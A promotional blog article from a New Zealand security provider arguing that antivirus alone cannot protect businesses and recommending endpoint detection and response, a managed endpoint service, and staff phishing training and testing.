The response in this story is based on a real incident that The Instillery Security Intelligence...
Why antivirus alone is not enough to protect your business
It’s no secret that the rate of cyberattacks targeting New Zealand businesses is growing. CERT NZ responded to 2,072 incidents alone during the third quarter of 2021 - a 53% increase from the previous quarter. The most concerning trend though is the complacency around device protection. Many business owners think that traditional antivirus (AV) software will be enough to keep their PCs, laptops, and mobile devices secure from malicious behaviour but the reality couldn’t be further from the truth.
Malicious software has grown more advanced to the point where you don’t even need to click on a malicious link to be at risk, and new and modified versions of these threats that can bypass AV detection are being released every day. Forward-thinking businesses are realising that more preventative measures are needed to keep themselves, their data, and staff safe.
Traditional antivirus alone cannot keep your business secure
Antivirus software is fantastic at identifying and quarantining known threats before they can cause harm but this reactive protection is simply inadequate on its own. The protection afforded by AV programs is only as good as its signature-based database. Malware and similar threats are growing increasingly more advanced and persistent and new and modified versions are released daily. If your organisation relies solely on antivirus software to protect its devices, then it will always be behind the curve in shielding itself from emerging threats and detecting potential breaches. In fact, Verizon’s 2021 Data Breach Investigations Report highlighted that a third of breaches take months or longer to be detected, and more significant damage can be done the longer a breach goes undetected.
That same report also highlighted that 85% of security incidents in 2021 had a human element. Antivirus software relies on alert-based responses and will notify your users when a detection has been made. If your user accidentally ignores an antivirus notification or moves an infected file from quarantine, that device and your network could subsequently become compromised. There is also the possibility that false-positive AV notifications could waste your IT security team's time and resources.
Finally, traditional antivirus has the significant drawback of being focused on finding threats via infected files and applications. It does not offer protection and detection for more advanced threats, such as actors gaining access to your devices via methods that do not use compromised files or applications. Without code, your antivirus has nothing to scan and the breach will likely go undetected until damage has already been caused.
How Endpoint Detect & Response Technology Provides Proactive Device Protection
Antivirus software is an important aspect of your business’s security but its reactive approach to endpoint protection means it shouldn’t be your only tool. Protecting endpoint devices such as PCs, laptops, and mobile devices requires more advanced technology and support than AV software can provide alone. Endpoint detection and response (EDR) software is the next evolutionary step for device protection and leverages intelligent analysis and machine learning to detect endpoint anomalies that could indicate a breach. For example, in addition to scanning software code, EDR technology will proactively seek out unusual or unexpected behaviour from applications that could indicate malicious intent and flag it for further investigation. This proactive approach can lead to the earliest detection of new and modified threats as it does not rely solely on a central database being updated. It will also close the cyber security gaps that antivirus programmes leave behind as EDR’s machine learning threat detection can identify device breaches regardless of where they originated from, such as methods that do not use infected files or applications to gain unauthorised access.
EDR software, such as CrowdStrike’s Falcon, replaces legacy AV software by combining next-generation antivirus protection together with machine learning and integrated threat intelligence feeds that identify potential breaches that will need further investigation by a security response team. To provide complete endpoint protection, our Secure Endpoint Service leverages both CrowdStrike’s EDR technology and our 24x7 security response team to provide world-leading endpoint security to as many New Zealand businesses as possible.
Why training & testing your people on cyber security is just as important
When it comes to cyber protection, ensuring that your business has adequate technology is only half the battle. When a breach occurs, it is likely to have originated from a human being performing an action they shouldn’t have, such as clicking a phishing link, rather than a failure in your technology. Half of the 2,072 incidents reported to CERT NZ during Q3 2021 were due to phishing and credential harvesting. This highlights that educating your staff on how to best avoid these types of targeted attacks is crucial. It is also a good idea to test how prepared your technology and employees are at repelling attacks. Threat Emulation services launch simulated attacks against your business and people to identify weaknesses in your defences to better enable you to adapt and bolster them.
Relying on antivirus alone does not provide enough protection to keep your business secure. Malicious software is becoming more advanced and persistent. The faster your IT security is able to identify potential breaches, the more secure your business will be. Endpoint protection and response technology provides next-generation antivirus protection and will monitor for application behaviour that indicates potential breaches and feed this information directly to a security response team for further investigation. Most security incidents have a human element and half are the result of employees falling victim to phishing and credential harvesting scams, so ensuring your staff are adequately educated on how best to spot and avoid these attacks, and frequently testing this knowledge, is key to preventing breaches from occurring in the first place.